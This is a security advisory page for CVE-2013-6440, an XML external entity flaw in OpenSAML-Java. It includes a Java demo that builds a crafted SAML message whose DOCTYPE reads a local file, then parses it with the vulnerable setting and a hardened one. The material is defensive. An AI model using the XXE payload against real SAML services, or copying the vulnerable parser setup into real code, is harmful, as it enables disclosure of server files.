Moderate severity · NVD Advisory · Published Feb 14, 2014 · Updated Apr 29, 2026
CVE-2013-6440
Description
The (1) BasicParserPool, (2) StaticBasicParserPool, (3) XML Decrypter, and (4) SAML Decrypter in Shibboleth OpenSAML-Java before 2.6.1 set the expandEntityReferences property to true, which allows remote attackers to conduct XML external entity (XXE) attacks via a crafted XML DOCTYPE declaration.
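The description above is the whole mechanism: the parser pools hand attacker-controlled XML (an inbound SAML message or an encrypted assertion) to a DOM parser with entity-reference expansion enabled, so a DOCTYPE that declares an external entity gets resolved when the entity is referenced. The following is an added example, not OpenSAML or Shibboleth code: it uses the plain JAXP DocumentBuilderFactory that BasicParserPool wraps, parses a constructed SAML-shaped payload once with the pre-2.6.1 setting (expandEntityReferences=true) and once with a hardened configuration, and returns what the Issuer element contains afterwards. The class and method names, the temp file and the "hunter2" secret are all assumptions made up for the demonstration. Note that on JAXP/Xerces, turning expandEntityReferences off by itself is not a complete XXE defence, so the hardened form also refuses any DOCTYPE and disables external entities explicitly.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

/**
 * Added example, not OpenSAML code. Reproduces the CVE-2013-6440 XXE pattern against the JAXP
 * DocumentBuilderFactory that OpenSAML's BasicParserPool configures, and shows the hardened
 * configuration beside it. All names here are illustrative assumptions.
 */
public class XxeDemo {

    // Constructed payload: the DOCTYPE declares an external entity that points at a local file,
    // and the Issuer element references it, so a parser that resolves entities inlines the file.
    static String craftedSamlResponse(Path secret) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE Response [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
             + "<samlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\""
             + " xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\">"
             + "<saml:Issuer>&xxe;</saml:Issuer>"
             + "</samlp:Response>";
    }

    // The setting the unpatched parser pools used: entity references are expanded in place.
    static DocumentBuilderFactory vulnerableFactory() {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setExpandEntityReferences(true);
        return dbf;
    }

    // The 2.6.1 default (expandEntityReferences=false) plus the standard JAXP XXE hardening.
    static DocumentBuilderFactory hardenedFactory() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setExpandEntityReferences(false);
        // A SAML message never legitimately carries a DOCTYPE; refusing it up front also
        // stops internal-entity ("billion laughs") expansion before any entity is declared.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces: Xerces can still fetch external entities with expansion disabled.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        return dbf;
    }

    /** Parses the message and returns the Issuer text, or "rejected: ..." if the parser refused it. */
    static String issuerText(DocumentBuilderFactory dbf, String xml) throws Exception {
        DocumentBuilder db = dbf.newDocumentBuilder();
        try {
            Document doc = db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement()
                      .getElementsByTagNameNS("urn:oasis:names:tc:SAML:2.0:assertion", "Issuer")
                      .item(0).getTextContent();
        } catch (SAXParseException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for a file the attacker wants to read from the SP or IdP host (constructed).
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "db_password=hunter2");
        String xml = craftedSamlResponse(secret);

        System.out.println("vulnerable issuer: " + issuerText(vulnerableFactory(), xml));
        System.out.println("hardened issuer:   " + issuerText(hardenedFactory(), xml));
        Files.delete(secret);
    }
}
```

With the vulnerable factory the Issuer text is the secret file's contents, which in a real deployment would be reflected back to the attacker through an error message or an out-of-band channel; with the hardened factory the parse fails on the DOCTYPE before any entity is resolved. The same two knobs, the expandEntityReferences property and the disallow-doctype-decl builder feature, are what to set on an OpenSAML 2.x parser pool if upgrading to 2.6.1 is not immediately possible.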
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| org.opensaml:opensaml (Maven) | < 2.6.1 | 2.6.1 |
Affected products
- cpe:2.3:a:internet2:opensaml:2.0:*:*:*:*:*:*:*
- cpe:2.3:a:internet2:opensaml:2.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:internet2:opensaml:2.2.0:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:*:*:*:*:*:*:*:* (range: <= 2.6.0)
- cpe:2.3:a:shibboleth:opensaml:2.4.0:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.4.1:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.4.2:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.4.3:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.0:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.1:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.2:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.3:*:*:*:*:*:*:*
Patches
No patches discovered yet.
Vulnerability mechanics
BasicParserPool, StaticBasicParserPool and the XML and SAML decrypters build their DOM parser with the expandEntityReferences property set to true. Attacker-supplied XML reaching those parsers (an inbound SAML message or an encrypted assertion) can therefore carry a DOCTYPE that declares an external entity, and the parser resolves that entity when it is referenced: a classic XML external entity (XXE) attack, allowing local file disclosure or server-side requests from the parsing host. Version 2.6.1 changes the property's default to false.
References
- github.com/advisories/GHSA-v723-58jv-2qc4 (advisory; GHSA)
- nvd.nist.gov/vuln/detail/CVE-2013-6440 (advisory; GHSA)
- blog.sendsafely.com/post/69590974866/web-based-single-sign-on-and-the-dangers-of-saml-xml (web; NVD)
- rhn.redhat.com/errata/RHSA-2014-0170.html (web; NVD)
- rhn.redhat.com/errata/RHSA-2014-0171.html (web; NVD)
- rhn.redhat.com/errata/RHSA-2014-0172.html (web; NVD)
- rhn.redhat.com/errata/RHSA-2014-0195.html (web; NVD)
- shibboleth.net/community/advisories/secadv_20131213.txt (web; NVD)
- bugzilla.redhat.com/show_bug.cgi (web; NVD)
- www.oracle.com/security-alerts/cpujan2022.html (web; NVD)
News mentions
No linked articles in our index yet.